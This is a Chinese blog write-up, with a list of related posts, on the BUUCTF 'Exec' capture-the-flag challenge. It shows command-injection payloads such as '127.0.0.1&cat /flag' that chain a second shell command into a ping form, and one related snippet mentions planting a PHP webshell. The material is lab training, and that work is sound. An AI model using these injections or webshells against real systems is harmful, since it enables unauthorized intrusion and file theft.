Buuctf Exec

最新推荐文章于 2024-07-25 22:56:40 发布
最新推荐文章于 2024-07-25 22:56:40 发布
阅读量1.7k 收藏 1
点赞数 1
分类专栏: buuctf Web 文章标签: buuctf web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dexret/article/details/121754965
版权

打开该靶机,发现该页面为一个ping页面

 输入127.0.0.1测试,发现和电脑cmd上ping的结果差不多

分析一下ping小技巧

&,&&,|,|| 的区别:

  • A&B:简单的拼接,A、B之间无制约关系
  • A&&B:A执行成功,然后才会执行B
  • A|B:A的输出,作为B的输入
  • A||B:A执行失败,然后才会执行B

构造payload

127.0.0.1&cat /flag

得到该题的flag

flag{e166f81d-5663-4153-b837-c6484858bf25}

BUUCTF[ACTF2020 新生赛]Exec
m0_47745762的博客
07-20 350
一、题目内容 对Linux命令的运用 二、解题步骤 ①从根目录查找flag (1)进入到靶机中 (2)用本机地址随便ping一下,看看能得到那些信息 (3)然后通过ls命令查找当前目录中有哪些文件 (4)查找后发现只有一个index.php的文件,我们查找一下里面是否含有flag的信息 (5)分析PHP代码,发现只有一个isset函数用于判断post传过来的数据是否被提交过来 (6) 我们发现当前目录中并没有关于flag的相关信息,那就可能是在根目录上,我们就挨个返..
BUUCTF WEB exec+lovesql
qq_41696858的博客
08-18 254
攻防世界靶场不知道咋了,又进不去了 那就刷几题BUUCTFexec 这题题目名字给的挺明显的,命令执行 经检测,|,||没有被过滤,且有回显,那就一级级往上找就行了 127.0.0.1|ls ../../../ 127.0.0.1|cat ../../../flag LoveSql SQL注入,注入点和之前一样的,一个单引号直接回显 那么后面就是payload了 admin 123' order by 4 # 开始报不同的错,可知列数为3 admin 123' union select 1,2,3
BUUCTF-Exec
最新发布
2401_82505448的博客
07-25 259
发现根目录有一个flag文件,接着我们就可以查看根目录的flag。前面错误后面也可以执行,所有都可执行。|| 或 前面命令错误才会执行后面的。&& 与 前者成立前提下后者才执行。
buuctf_Exec
qq_61968245的博客
12-19 923
0x01 题目链接 BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges 0x02 题目 打开题目就看到大大的PING,二话不说直接ping个本地ip 涉及知识点: 在命令执行的过程中,可以通过一些常用特殊字符来执行其他语句 ; //命令分割符,即当执行完第一个命令,继续执行下一个命令 | //管道 0x03 解题 那么尝试在当前文...
BUUCTF刷题记录 Exec
m0_46576074的博客
05-11 421
[ACTF2020 新生赛]Exec 进入页面 首先 127.0.0.1;ls 进行目录读取,然后 127.0.0.1;cat /flag 得flag
BUUCTF web题目之Exec
m0_54993799的博客
12-12 992
' > 123.php 点击ping后 ,复制url,在url后添加 /123.php , 用蚁剑连接 , 密码就是$_post[] 中括号里的内容。我输入 1| ls ,得到当前页面为index.php。127.0.0.1|whoami ,得到下面结果。测试连接成功后,点击添加 ,双击进入文件管理页面。查找文件夹,最后在根目录下发现flag。确定是根目录后,用cat查看flag。双击flag,即可看到flag内容。尝试cd到往上三层,但是没有成功。开启靶机并访问,得到下面的页面。
buuctf exec 1
09-26
如果你想执行buuctf exec 1这个命令,可以使用exec函数来实现。具体的操作如下: ```php $command = "buuctf exec 1"; $result = exec($command); echo $result; ?> ``` 以上代码将会执行buuctf exec 1这个命令,并...
BUUCTF Exec
qq_57294337的博客
11-17 194
BUUCTF Exec
BUUCTF [ACTF2020 新生赛] Exec
Senimo
10-18 993
BUUCTF [ACTF2020 新生赛] Exec 启动靶机,打开环境: 页面可以执行Ping命令,判断应为命令执行漏洞 尝试输入正常IP127.0.0.1查看其回显: 127.0.0.1 其为正常回显,测试管道连接符|是否能用: 127.0.0.1 | ls 管道连接符|可以正常使用,并且ls命令可以正常执行 查看根目录: 127.0.0.1 | ls / 发现flag文件,使用cat命令查看: 127.0.0.1 | cat /flag 得到flag 基础的通过管道连接符|就可以的命
BUUCTF [ACTF2020 新生赛]Exec
FY_13_14的博客
01-05 264
1.刚打开的时候如图所示 先随便用一个地址127.0.0.1 2.然后查下目录127.0.0.1|ls ../../../ ls看文件目录 发现flag 直接抓127.0.0.1;cat/flag 拿到flag flag{fdc896b1-e032-4e87-846f-082e348e024f} 常见的管道符 |(就是按位或),直接执行|后面的语句 ||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 &(就是按位与),&前.
BUUCTF刷题记录】[ACTF2020新生赛]Exec
m0_60911102的博客
09-01 1396
BUUCTF刷题之命令执行---exec
BUUCTF:[ACTF2020 新生赛]Exec
末初的CSDN博客
10-20 362
题目地址:https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Exec 命令执行,使用;或者|进行注入 在根目录发现flag,直接读取
BUUCTF-WriteUp
鱼的博客
02-01 765
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
BUUCTFWebExec(命令执行漏洞)
qq_70434663的博客
03-02 1258
在根目录中我们发现有一个flag文件,猜测我们的flag就在里面,所以我们需要使用命令来读取flag文件的内容。命令大家可以在网上查看,这里使用的命令是127.0.0.1 & cat /flag(也可以使用127.0.0.1 | cat /flag)了解拼接符后我们先试一下查看目录,发现使用127.0.0.1 && ls执行不了,使用127.0.0.1 & ls有回显。在进入靶场后发现窗口ping,猜测可能是SQL注入,也有可能是命令执行漏洞。命令执行就用命令拼接符执行漏洞命令就行。
BUUCTFExec,攻防世界之command_execution
金 帛的博客
03-16 2190
BUUCTFWP
BUUCTF-[ACTF2020 新生赛]Exec1
Monica的博客
09-11 4207
目录 题目: 分析: 知识点: 方法: 方法1:;前面和后面命令都要执行,无论前面真假 方法2:|(就是按位或),直接执行|后面的语句 方法3:||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 方法4:&前面和后面命令都要执行,无论前面真假 方法5:&&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 注意: 题目: 分析: 通过...
Buuctf-Web-[ACTF2020 新生赛]Exec 题解&思路总结
m0_62239233的博客
04-22 716
常见的web漏洞——命令注入
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值